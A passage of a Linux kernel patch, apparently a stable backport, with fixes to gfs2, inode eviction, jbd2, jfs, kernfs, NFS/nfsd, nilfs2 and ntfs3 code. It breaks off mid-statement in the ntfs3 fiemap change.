+ 	if (!sb_rdonly(sdp->sd_vfs)) {
+-		struct gfs2_holder freeze_gh;
+-
+-		gfs2_holder_mark_uninitialized(&freeze_gh);
+-		if (sdp->sd_freeze_gl &&
+-		    !gfs2_glock_is_locked_by_me(sdp->sd_freeze_gl)) {
+-			ret = gfs2_freeze_lock(sdp, &freeze_gh,
+-				       log_write_allowed ? 0 : LM_FLAG_TRY);
+-			if (ret == GLR_TRYFAILED)
+-				ret = 0;
++		bool locked = mutex_trylock(&sdp->sd_freeze_mutex);
++
++		if (sdp->sd_quotad_process &&
++		    current != sdp->sd_quotad_process) {
++			kthread_stop(sdp->sd_quotad_process);
++			sdp->sd_quotad_process = NULL;
+ 		}
+-		if (!ret)
+-			gfs2_make_fs_ro(sdp);
++
++		if (sdp->sd_logd_process &&
++		    current != sdp->sd_logd_process) {
++			kthread_stop(sdp->sd_logd_process);
++			sdp->sd_logd_process = NULL;
++		}
++
++		wait_event_timeout(sdp->sd_log_waitq,
++				   gfs2_log_is_empty(sdp),
++				   HZ * 5);
++
++		sdp->sd_vfs->s_flags |= SB_RDONLY;
++
++		if (locked)
++			mutex_unlock(&sdp->sd_freeze_mutex);
++
+ 		/*
+ 		 * Dequeue any pending non-system glock holders that can no
+ 		 * longer be granted because the file system is withdrawn.
+ 		 */
+ 		gfs2_gl_dq_holders(sdp);
+-		gfs2_freeze_unlock(&freeze_gh);
+ 	}
+ 
+ 	if (sdp->sd_lockstruct.ls_ops->lm_lock == NULL) { /* lock_nolock */
+@@ -187,15 +197,8 @@ static void signal_our_withdraw(struct gfs2_sbd *sdp)
+ 	}
+ 	sdp->sd_jinode_gh.gh_flags |= GL_NOCACHE;
+ 	gfs2_glock_dq(&sdp->sd_jinode_gh);
+-	if (test_bit(SDF_FS_FROZEN, &sdp->sd_flags)) {
+-		/* Make sure gfs2_unfreeze works if partially-frozen */
+-		flush_work(&sdp->sd_freeze_work);
+-		atomic_set(&sdp->sd_freeze_state, SFS_FROZEN);
+-		thaw_super(sdp->sd_vfs);
+-	} else {
+-		wait_on_bit(&i_gl->gl_flags, GLF_DEMOTE,
+-			    TASK_UNINTERRUPTIBLE);
+-	}
++	gfs2_thaw_freeze_initiator(sdp->sd_vfs);
++	wait_on_bit(&i_gl->gl_flags, GLF_DEMOTE, TASK_UNINTERRUPTIBLE);
+ 
+ 	/*
+ 	 * holder_uninit to force glock_put, to force dlm to let go
+diff --git a/fs/gfs2/util.h b/fs/gfs2/util.h
+index 78ec190f4155b..3291e33e81e97 100644
+--- a/fs/gfs2/util.h
++++ b/fs/gfs2/util.h
+@@ -149,8 +149,9 @@ int gfs2_io_error_i(struct gfs2_sbd *sdp, const char *function,
+ 
+ extern int check_journal_clean(struct gfs2_sbd *sdp, struct gfs2_jdesc *jd,
+ 			       bool verbose);
+-extern int gfs2_freeze_lock(struct gfs2_sbd *sdp,
+-			    struct gfs2_holder *freeze_gh, int caller_flags);
++extern int gfs2_freeze_lock_shared(struct gfs2_sbd *sdp,
++				   struct gfs2_holder *freeze_gh,
++				   int caller_flags);
+ extern void gfs2_freeze_unlock(struct gfs2_holder *freeze_gh);
+ 
+ #define gfs2_io_error(sdp) \
+diff --git a/fs/inode.c b/fs/inode.c
+index 8cfda7a6d5900..417ba66af4a3b 100644
+--- a/fs/inode.c
++++ b/fs/inode.c
+@@ -486,6 +486,39 @@ static void inode_lru_list_del(struct inode *inode)
+ 		this_cpu_dec(nr_unused);
+ }
+ 
++static void inode_pin_lru_isolating(struct inode *inode)
++{
++	lockdep_assert_held(&inode->i_lock);
++	WARN_ON(inode->i_state & (I_LRU_ISOLATING | I_FREEING | I_WILL_FREE));
++	inode->i_state |= I_LRU_ISOLATING;
++}
++
++static void inode_unpin_lru_isolating(struct inode *inode)
++{
++	spin_lock(&inode->i_lock);
++	WARN_ON(!(inode->i_state & I_LRU_ISOLATING));
++	inode->i_state &= ~I_LRU_ISOLATING;
++	smp_mb();
++	wake_up_bit(&inode->i_state, __I_LRU_ISOLATING);
++	spin_unlock(&inode->i_lock);
++}
++
++static void inode_wait_for_lru_isolating(struct inode *inode)
++{
++	spin_lock(&inode->i_lock);
++	if (inode->i_state & I_LRU_ISOLATING) {
++		DEFINE_WAIT_BIT(wq, &inode->i_state, __I_LRU_ISOLATING);
++		wait_queue_head_t *wqh;
++
++		wqh = bit_waitqueue(&inode->i_state, __I_LRU_ISOLATING);
++		spin_unlock(&inode->i_lock);
++		__wait_on_bit(wqh, &wq, bit_wait, TASK_UNINTERRUPTIBLE);
++		spin_lock(&inode->i_lock);
++		WARN_ON(inode->i_state & I_LRU_ISOLATING);
++	}
++	spin_unlock(&inode->i_lock);
++}
++
+ /**
+  * inode_sb_list_add - add inode to the superblock list of inodes
+  * @inode: inode to add
+@@ -654,6 +687,8 @@ static void evict(struct inode *inode)
+ 
+ 	inode_sb_list_del(inode);
+ 
++	inode_wait_for_lru_isolating(inode);
++
+ 	/*
+ 	 * Wait for flusher thread to be done with the inode so that filesystem
+ 	 * does not start destroying it while writeback is still running. Since
+@@ -855,7 +890,7 @@ static enum lru_status inode_lru_isolate(struct list_head *item,
+ 	 * be under pressure before the cache inside the highmem zone.
+ 	 */
+ 	if (inode_has_buffers(inode) || !mapping_empty(&inode->i_data)) {
+-		__iget(inode);
++		inode_pin_lru_isolating(inode);
+ 		spin_unlock(&inode->i_lock);
+ 		spin_unlock(lru_lock);
+ 		if (remove_inode_buffers(inode)) {
+@@ -868,7 +903,7 @@ static enum lru_status inode_lru_isolate(struct list_head *item,
+ 			if (current->reclaim_state)
+ 				current->reclaim_state->reclaimed_slab += reap;
+ 		}
+-		iput(inode);
++		inode_unpin_lru_isolating(inode);
+ 		spin_lock(lru_lock);
+ 		return LRU_RETRY;
+ 	}
+diff --git a/fs/jbd2/journal.c b/fs/jbd2/journal.c
+index c8d59f7c47453..d3d3ea439d29b 100644
+--- a/fs/jbd2/journal.c
++++ b/fs/jbd2/journal.c
+@@ -971,10 +971,13 @@ int jbd2_journal_bmap(journal_t *journal, unsigned long blocknr,
+ {
+ 	int err = 0;
+ 	unsigned long long ret;
+-	sector_t block = 0;
++	sector_t block = blocknr;
+ 
+-	if (journal->j_inode) {
+-		block = blocknr;
++	if (journal->j_bmap) {
++		err = journal->j_bmap(journal, &block);
++		if (err == 0)
++			*retp = block;
++	} else if (journal->j_inode) {
+ 		ret = bmap(journal->j_inode, &block);
+ 
+ 		if (ret || !block) {
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 4462274e325ac..d2df00676292d 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -1626,6 +1626,8 @@ s64 dbDiscardAG(struct inode *ip, int agno, s64 minlen)
+ 		} else if (rc == -ENOSPC) {
+ 			/* search for next smaller log2 block */
+ 			l2nb = BLKSTOL2(nblocks) - 1;
++			if (unlikely(l2nb < 0))
++				break;
+ 			nblocks = 1LL << l2nb;
+ 		} else {
+ 			/* Trim any already allocated blocks */
+diff --git a/fs/jfs/jfs_dtree.c b/fs/jfs/jfs_dtree.c
+index 031d8f570f581..5d3127ca68a42 100644
+--- a/fs/jfs/jfs_dtree.c
++++ b/fs/jfs/jfs_dtree.c
+@@ -834,6 +834,8 @@ int dtInsert(tid_t tid, struct inode *ip,
+ 	 * the full page.
+ 	 */
+ 	DT_GETSEARCH(ip, btstack->top, bn, mp, p, index);
++	if (p->header.freelist == 0)
++		return -EINVAL;
+ 
+ 	/*
+ 	 *	insert entry for new key
+diff --git a/fs/kernfs/file.c b/fs/kernfs/file.c
+index e4a50e4ff0d23..adf3536cfec81 100644
+--- a/fs/kernfs/file.c
++++ b/fs/kernfs/file.c
+@@ -532,9 +532,11 @@ static int kernfs_fop_mmap(struct file *file, struct vm_area_struct *vma)
+ 		goto out_put;
+ 
+ 	rc = 0;
+-	of->mmapped = true;
+-	of_on(of)->nr_mmapped++;
+-	of->vm_ops = vma->vm_ops;
++	if (!of->mmapped) {
++		of->mmapped = true;
++		of_on(of)->nr_mmapped++;
++		of->vm_ops = vma->vm_ops;
++	}
+ 	vma->vm_ops = &kernfs_vm_ops;
+ out_put:
+ 	kernfs_put_active(of->kn);
+diff --git a/fs/nfs/pnfs.c b/fs/nfs/pnfs.c
+index 4448ff829cbb9..8c1f47ca5dc53 100644
+--- a/fs/nfs/pnfs.c
++++ b/fs/nfs/pnfs.c
+@@ -1997,6 +1997,14 @@ pnfs_update_layout(struct inode *ino,
+ 	}
+ 
+ lookup_again:
++	if (!nfs4_valid_open_stateid(ctx->state)) {
++		trace_pnfs_update_layout(ino, pos, count,
++					 iomode, lo, lseg,
++					 PNFS_UPDATE_LAYOUT_INVALID_OPEN);
++		lseg = ERR_PTR(-EIO);
++		goto out;
++	}
++
+ 	lseg = ERR_PTR(nfs4_client_recover_expired_lease(clp));
+ 	if (IS_ERR(lseg))
+ 		goto out;
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 7451cd34710d0..df9dbd93663e2 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1106,6 +1106,7 @@ nfsd4_setattr(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	};
+ 	struct inode *inode;
+ 	__be32 status = nfs_ok;
++	bool save_no_wcc;
+ 	int err;
+ 
+ 	if (setattr->sa_iattr.ia_valid & ATTR_SIZE) {
+@@ -1131,8 +1132,11 @@ nfsd4_setattr(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 
+ 	if (status)
+ 		goto out;
++	save_no_wcc = cstate->current_fh.fh_no_wcc;
++	cstate->current_fh.fh_no_wcc = true;
+ 	status = nfsd_setattr(rqstp, &cstate->current_fh, &attrs,
+ 				0, (time64_t)0);
++	cstate->current_fh.fh_no_wcc = save_no_wcc;
+ 	if (!status)
+ 		status = nfserrno(attrs.na_labelerr);
+ 	if (!status)
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 8d15959004ad2..f04de2553c90b 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -318,6 +318,7 @@ free_nbl(struct kref *kref)
+ 	struct nfsd4_blocked_lock *nbl;
+ 
+ 	nbl = container_of(kref, struct nfsd4_blocked_lock, nbl_kref);
++	locks_release_private(&nbl->nbl_lock);
+ 	kfree(nbl);
+ }
+ 
+@@ -325,7 +326,6 @@ static void
+ free_blocked_lock(struct nfsd4_blocked_lock *nbl)
+ {
+ 	locks_delete_block(&nbl->nbl_lock);
+-	locks_release_private(&nbl->nbl_lock);
+ 	kref_put(&nbl->nbl_kref, free_nbl);
+ }
+ 
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index 813ae75e7128e..2feaa49fb9fe2 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -709,6 +709,7 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 	char *mesg = buf;
+ 	int fd, err;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv;
+ 
+ 	err = get_int(&mesg, &fd);
+ 	if (err != 0 || fd < 0)
+@@ -718,13 +719,15 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 	if (err != 0)
+ 		return err;
+ 
+-	err = svc_addsock(nn->nfsd_serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
++	serv = nn->nfsd_serv;
++	err = svc_addsock(serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
+ 
+-	if (err >= 0 &&
+-	    !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+-		svc_get(nn->nfsd_serv);
++	if (err < 0 && !serv->sv_nrthreads && !nn->keep_active)
++		nfsd_last_thread(net);
++	else if (err >= 0 && !serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
++		svc_get(serv);
+ 
+-	nfsd_put(net);
++	svc_put(serv);
+ 	return err;
+ }
+ 
+@@ -738,6 +741,7 @@ static ssize_t __write_ports_addxprt(char *buf, struct net *net, const struct cr
+ 	struct svc_xprt *xprt;
+ 	int port, err;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv;
+ 
+ 	if (sscanf(buf, "%15s %5u", transport, &port) != 2)
+ 		return -EINVAL;
+@@ -749,29 +753,33 @@ static ssize_t __write_ports_addxprt(char *buf, struct net *net, const struct cr
+ 	if (err != 0)
+ 		return err;
+ 
+-	err = svc_xprt_create(nn->nfsd_serv, transport, net,
++	serv = nn->nfsd_serv;
++	err = svc_xprt_create(serv, transport, net,
+ 			      PF_INET, port, SVC_SOCK_ANONYMOUS, cred);
+ 	if (err < 0)
+ 		goto out_err;
+ 
+-	err = svc_xprt_create(nn->nfsd_serv, transport, net,
++	err = svc_xprt_create(serv, transport, net,
+ 			      PF_INET6, port, SVC_SOCK_ANONYMOUS, cred);
+ 	if (err < 0 && err != -EAFNOSUPPORT)
+ 		goto out_close;
+ 
+-	if (!nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+-		svc_get(nn->nfsd_serv);
++	if (!serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
++		svc_get(serv);
+ 
+-	nfsd_put(net);
++	svc_put(serv);
+ 	return 0;
+ out_close:
+-	xprt = svc_find_xprt(nn->nfsd_serv, transport, net, PF_INET, port);
++	xprt = svc_find_xprt(serv, transport, net, PF_INET, port);
+ 	if (xprt != NULL) {
+ 		svc_xprt_close(xprt);
+ 		svc_xprt_put(xprt);
+ 	}
+ out_err:
+-	nfsd_put(net);
++	if (!serv->sv_nrthreads && !nn->keep_active)
++		nfsd_last_thread(net);
++
++	svc_put(serv);
+ 	return err;
+ }
+ 
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index 0e557fb60a0e3..996f3f62335b2 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -97,8 +97,6 @@ int		nfsd_pool_stats_open(struct inode *, struct file *);
+ int		nfsd_pool_stats_release(struct inode *, struct file *);
+ void		nfsd_shutdown_threads(struct net *net);
+ 
+-void		nfsd_put(struct net *net);
+-
+ bool		i_am_nfsd(void);
+ 
+ struct nfsdfs_client {
+@@ -134,6 +132,7 @@ int nfsd_vers(struct nfsd_net *nn, int vers, enum vers_op change);
+ int nfsd_minorversion(struct nfsd_net *nn, u32 minorversion, enum vers_op change);
+ void nfsd_reset_versions(struct nfsd_net *nn);
+ int nfsd_create_serv(struct net *net);
++void nfsd_last_thread(struct net *net);
+ 
+ extern int nfsd_max_blksize;
+ 
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 9eb529969b224..80a2b3631adbf 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -532,9 +532,14 @@ static struct notifier_block nfsd_inet6addr_notifier = {
+ /* Only used under nfsd_mutex, so this atomic may be overkill: */
+ static atomic_t nfsd_notifier_refcount = ATOMIC_INIT(0);
+ 
+-static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
++void nfsd_last_thread(struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv = nn->nfsd_serv;
++
++	spin_lock(&nfsd_notifier_lock);
++	nn->nfsd_serv = NULL;
++	spin_unlock(&nfsd_notifier_lock);
+ 
+ 	/* check if the notifier still has clients */
+ 	if (atomic_dec_return(&nfsd_notifier_refcount) == 0) {
+@@ -544,6 +549,8 @@ static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
+ #endif
+ 	}
+ 
++	svc_xprt_destroy_all(serv, net);
++
+ 	/*
+ 	 * write_ports can create the server without actually starting
+ 	 * any threads--if we get shut down before any threads are
+@@ -555,7 +562,6 @@ static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
+ 		return;
+ 
+ 	nfsd_shutdown_net(net);
+-	pr_info("nfsd: last server has exited, flushing export cache\n");
+ 	nfsd_export_flush(net);
+ }
+ 
+@@ -634,7 +640,8 @@ void nfsd_shutdown_threads(struct net *net)
+ 	svc_get(serv);
+ 	/* Kill outstanding nfsd threads */
+ 	svc_set_num_threads(serv, NULL, 0);
+-	nfsd_put(net);
++	nfsd_last_thread(net);
++	svc_put(serv);
+ 	mutex_unlock(&nfsd_mutex);
+ }
+ 
+@@ -665,9 +672,6 @@ int nfsd_create_serv(struct net *net)
+ 	serv->sv_maxconn = nn->max_connections;
+ 	error = svc_bind(serv, net);
+ 	if (error < 0) {
+-		/* NOT nfsd_put() as notifiers (see below) haven't
+-		 * been set up yet.
+-		 */
+ 		svc_put(serv);
+ 		return error;
+ 	}
+@@ -710,29 +714,6 @@ int nfsd_get_nrthreads(int n, int *nthreads, struct net *net)
+ 	return 0;
+ }
+ 
+-/* This is the callback for kref_put() below.
+- * There is no code here as the first thing to be done is
+- * call svc_shutdown_net(), but we cannot get the 'net' from
+- * the kref.  So do all the work when kref_put returns true.
+- */
+-static void nfsd_noop(struct kref *ref)
+-{
+-}
+-
+-void nfsd_put(struct net *net)
+-{
+-	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-
+-	if (kref_put(&nn->nfsd_serv->sv_refcnt, nfsd_noop)) {
+-		svc_xprt_destroy_all(nn->nfsd_serv, net);
+-		nfsd_last_thread(nn->nfsd_serv, net);
+-		svc_destroy(&nn->nfsd_serv->sv_refcnt);
+-		spin_lock(&nfsd_notifier_lock);
+-		nn->nfsd_serv = NULL;
+-		spin_unlock(&nfsd_notifier_lock);
+-	}
+-}
+-
+ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ {
+ 	int i = 0;
+@@ -783,7 +764,7 @@ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ 		if (err)
+ 			break;
+ 	}
+-	nfsd_put(net);
++	svc_put(nn->nfsd_serv);
+ 	return err;
+ }
+ 
+@@ -796,8 +777,8 @@ int
+ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ {
+ 	int	error;
+-	bool	nfsd_up_before;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv;
+ 
+ 	mutex_lock(&nfsd_mutex);
+ 	dprintk("nfsd: creating service\n");
+@@ -815,24 +796,23 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 	error = nfsd_create_serv(net);
+ 	if (error)
+ 		goto out;
+-
+-	nfsd_up_before = nn->nfsd_net_up;
++	serv = nn->nfsd_serv;
+ 
+ 	error = nfsd_startup_net(net, cred);
+ 	if (error)
+ 		goto out_put;
+-	error = svc_set_num_threads(nn->nfsd_serv, NULL, nrservs);
++	error = svc_set_num_threads(serv, NULL, nrservs);
+ 	if (error)
+-		goto out_shutdown;
+-	error = nn->nfsd_serv->sv_nrthreads;
+-out_shutdown:
+-	if (error < 0 && !nfsd_up_before)
+-		nfsd_shutdown_net(net);
++		goto out_put;
++	error = serv->sv_nrthreads;
+ out_put:
+ 	/* Threads now hold service active */
+ 	if (xchg(&nn->keep_active, 0))
+-		nfsd_put(net);
+-	nfsd_put(net);
++		svc_put(serv);
++
++	if (serv->sv_nrthreads == 0)
++		nfsd_last_thread(net);
++	svc_put(serv);
+ out:
+ 	mutex_unlock(&nfsd_mutex);
+ 	return error;
+@@ -983,31 +963,8 @@ nfsd(void *vrqstp)
+ 	atomic_dec(&nfsd_th_cnt);
+ 
+ out:
+-	/* Take an extra ref so that the svc_put in svc_exit_thread()
+-	 * doesn't call svc_destroy()
+-	 */
+-	svc_get(nn->nfsd_serv);
+-
+ 	/* Release the thread */
+ 	svc_exit_thread(rqstp);
+-
+-	/* We need to drop a ref, but may not drop the last reference
+-	 * without holding nfsd_mutex, and we cannot wait for nfsd_mutex as that
+-	 * could deadlock with nfsd_shutdown_threads() waiting for us.
+-	 * So three options are:
+-	 * - drop a non-final reference,
+-	 * - get the mutex without waiting
+-	 * - sleep briefly andd try the above again
+-	 */
+-	while (!svc_put_not_last(nn->nfsd_serv)) {
+-		if (mutex_trylock(&nfsd_mutex)) {
+-			nfsd_put(net);
+-			mutex_unlock(&nfsd_mutex);
+-			break;
+-		}
+-		msleep(20);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 17e96e58e7727..8f6d611d13803 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -475,7 +475,7 @@ nfsd_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	int		accmode = NFSD_MAY_SATTR;
+ 	umode_t		ftype = 0;
+ 	__be32		err;
+-	int		host_err;
++	int		host_err = 0;
+ 	bool		get_write_count;
+ 	bool		size_change = (iap->ia_valid & ATTR_SIZE);
+ 	int		retries;
+@@ -533,6 +533,7 @@ nfsd_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	}
+ 
+ 	inode_lock(inode);
++	fh_fill_pre_attrs(fhp);
+ 	for (retries = 1;;) {
+ 		struct iattr attrs;
+ 
+@@ -560,13 +561,14 @@ nfsd_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		attr->na_aclerr = set_posix_acl(&init_user_ns,
+ 						inode, ACL_TYPE_DEFAULT,
+ 						attr->na_dpacl);
++	fh_fill_post_attrs(fhp);
+ 	inode_unlock(inode);
+ 	if (size_change)
+ 		put_write_access(inode);
+ out:
+ 	if (!host_err)
+ 		host_err = commit_metadata(fhp);
+-	return nfserrno(host_err);
++	return err != 0 ? err : nfserrno(host_err);
+ }
+ 
+ #if defined(CONFIG_NFSD_V4)
+diff --git a/fs/nilfs2/btree.c b/fs/nilfs2/btree.c
+index bd24a33fc72e1..42617080a8384 100644
+--- a/fs/nilfs2/btree.c
++++ b/fs/nilfs2/btree.c
+@@ -2224,6 +2224,7 @@ static int nilfs_btree_assign_p(struct nilfs_bmap *btree,
+ 	/* on-disk format */
+ 	binfo->bi_dat.bi_blkoff = cpu_to_le64(key);
+ 	binfo->bi_dat.bi_level = level;
++	memset(binfo->bi_dat.bi_pad, 0, sizeof(binfo->bi_dat.bi_pad));
+ 
+ 	return 0;
+ }
+diff --git a/fs/nilfs2/dat.c b/fs/nilfs2/dat.c
+index 242cc36bf1e97..351010828d883 100644
+--- a/fs/nilfs2/dat.c
++++ b/fs/nilfs2/dat.c
+@@ -158,6 +158,7 @@ void nilfs_dat_commit_start(struct inode *dat, struct nilfs_palloc_req *req,
+ int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
+ {
+ 	struct nilfs_dat_entry *entry;
++	__u64 start;
+ 	sector_t blocknr;
+ 	void *kaddr;
+ 	int ret;
+@@ -169,6 +170,7 @@ int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
+ 	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
+ 	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
+ 					     req->pr_entry_bh, kaddr);
++	start = le64_to_cpu(entry->de_start);
+ 	blocknr = le64_to_cpu(entry->de_blocknr);
+ 	kunmap_atomic(kaddr);
+ 
+@@ -179,6 +181,15 @@ int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
+ 			return ret;
+ 		}
+ 	}
++	if (unlikely(start > nilfs_mdt_cno(dat))) {
++		nilfs_err(dat->i_sb,
++			  "vblocknr = %llu has abnormal lifetime: start cno (= %llu) > current cno (= %llu)",
++			  (unsigned long long)req->pr_entry_nr,
++			  (unsigned long long)start,
++			  (unsigned long long)nilfs_mdt_cno(dat));
++		nilfs_dat_abort_entry(dat, req);
++		return -EINVAL;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/fs/nilfs2/direct.c b/fs/nilfs2/direct.c
+index 8f802f7b0840b..893ab36824cc2 100644
+--- a/fs/nilfs2/direct.c
++++ b/fs/nilfs2/direct.c
+@@ -319,6 +319,7 @@ static int nilfs_direct_assign_p(struct nilfs_bmap *direct,
+ 
+ 	binfo->bi_dat.bi_blkoff = cpu_to_le64(key);
+ 	binfo->bi_dat.bi_level = 0;
++	memset(binfo->bi_dat.bi_pad, 0, sizeof(binfo->bi_dat.bi_pad));
+ 
+ 	return 0;
+ }
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index dfe4930ccec64..70d9d08fc61bc 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -656,7 +656,7 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 	wnd->total_zeroes = nbits;
+ 	wnd->extent_max = MINUS_ONE_T;
+ 	wnd->zone_bit = wnd->zone_end = 0;
+-	wnd->nwnd = bytes_to_block(sb, bitmap_size(nbits));
++	wnd->nwnd = bytes_to_block(sb, ntfs3_bitmap_size(nbits));
+ 	wnd->bits_last = nbits & (wbits - 1);
+ 	if (!wnd->bits_last)
+ 		wnd->bits_last = wbits;
+@@ -1320,7 +1320,7 @@ int wnd_extend(struct wnd_bitmap *wnd, size_t new_bits)
+ 		return -EINVAL;
+ 
+ 	/* Align to 8 byte boundary. */
+-	new_wnd = bytes_to_block(sb, bitmap_size(new_bits));
++	new_wnd = bytes_to_block(sb, ntfs3_bitmap_size(new_bits));
+ 	new_last = new_bits & (wbits - 1);
+ 	if (!new_last)
+ 		new_last = wbits;
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index 02465ab3f398c..6cce71cc750ea 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -1897,6 +1897,47 @@ enum REPARSE_SIGN ni_parse_reparse(struct ntfs_inode *ni, struct ATTRIB *attr,
+ 	return REPARSE_LINK;
+ }
+ 
++/*
++ * fiemap_fill_next_extent_k - a copy of fiemap_fill_next_extent
++ * but it accepts kernel address for fi_extents_start
++ */
++static int fiemap_fill_next_extent_k(struct fiemap_extent_info *fieinfo,
++				     u64 logical, u64 phys, u64 len, u32 flags)
++{
++	struct fiemap_extent extent;
++	struct fiemap_extent __user *dest = fieinfo->fi_extents_start;
++
++	/* only count the extents */
++	if (fieinfo->fi_extents_max == 0) {
++		fieinfo->fi_extents_mapped++;
++		return (flags & FIEMAP_EXTENT_LAST) ? 1 : 0;
++	}
++
++	if (fieinfo->fi_extents_mapped >= fieinfo->fi_extents_max)
++		return 1;
++
++	if (flags & FIEMAP_EXTENT_DELALLOC)
++		flags |= FIEMAP_EXTENT_UNKNOWN;
++	if (flags & FIEMAP_EXTENT_DATA_ENCRYPTED)
++		flags |= FIEMAP_EXTENT_ENCODED;
++	if (flags & (FIEMAP_EXTENT_DATA_TAIL | FIEMAP_EXTENT_DATA_INLINE))
++		flags |= FIEMAP_EXTENT_NOT_ALIGNED;
++
++	memset(&extent, 0, sizeof(extent));
++	extent.fe_logical = logical;
++	extent.fe_physical = phys;
++	extent.fe_length = len;
++	extent.fe_flags = flags;
++
++	dest += fieinfo->fi_extents_mapped;
++	memcpy(dest, &extent, sizeof(extent));
++
++	fieinfo->fi_extents_mapped++;
++	if (fieinfo->fi_extents_mapped == fieinfo->fi_extents_max)
++		return 1;
++	return (flags & FIEMAP_EXTENT_LAST) ? 1 : 0;
++}
++
+ /*
+  * ni_fiemap - Helper for file_fiemap().
+  *
+@@ -1907,6 +1948,8 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 	      __u64 vbo, __u64 len)
+ {
+ 	int err = 0;
++	struct fiemap_extent __user *fe_u = fieinfo->fi_extents_start;
++	struct fiemap_extent *fe_k = NULL;
+ 	struct ntfs_sb_info *sbi = ni->mi.sbi;
+ 	u8 cluster_bits = sbi->cluster_bits;
+ 	struct runs_tree *run;
+@@ -1954,6 +1997,18 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 		goto out;
+ 	}
+ 
++	/*
++	 * To avoid lock problems replace pointer to user memory by pointer to kernel memory.
++	 */
++	fe_k = kmalloc_array(fieinfo->fi_extents_max,
++			     sizeof(struct fiemap_extent),
++			     GFP_NOFS | __GFP_ZERO);
++	if (!fe_k) {
++		err = -ENOMEM;
++		goto out;
++	}
++	fieinfo->fi_extents_start = fe_k;
++
+ 	end = vbo + len;
+ 	alloc_size = le64_to_cpu(attr->nres.alloc_size);
+ 	if (end > alloc_size)
+@@ -2042,8 +2097,9 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 			if (vbo + dlen >= end)
+ 				flags |= FIEMAP_EXTENT_LAST;
+ 
+-			err = fiemap_fill_next_extent(fieinfo, vbo, lbo, dlen,
+-						      flags);
++			err = fiemap_fill_next_extent_k(fieinfo, vbo, lbo, dlen,
++							flags);
++
+ 			if (err < 0)
+ 				break;
+ 			if (err == 1) {
+@@ -2063,7 +2119,8 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 		if (vbo + bytes >= end)
+ 			flags |= FIEMAP_EXTENT_LAST;
+ 
+-		err = fiemap_fill_next_extent(fieinfo, vbo, lbo, bytes, flags);
++		err = fiemap_fill_next_extent_k(fieinfo, vbo, lbo, bytes,
++						flags);
+ 		if (err < 0)
+ 			break;
+ 		if (err == 1) {
+@@ -2076,7 +2133,19 @@ int ni_fiemap(struct ntfs_inode *ni, struct fiemap_extent_info *fieinfo,
+ 
+ 	up_read(run_lock);
+ 
++	/*
++	 * Copy to user memory out of lock
++	 */
++	if (copy_to_user(fe_u, fe_k,
++			 fieinfo->fi_extents_max *
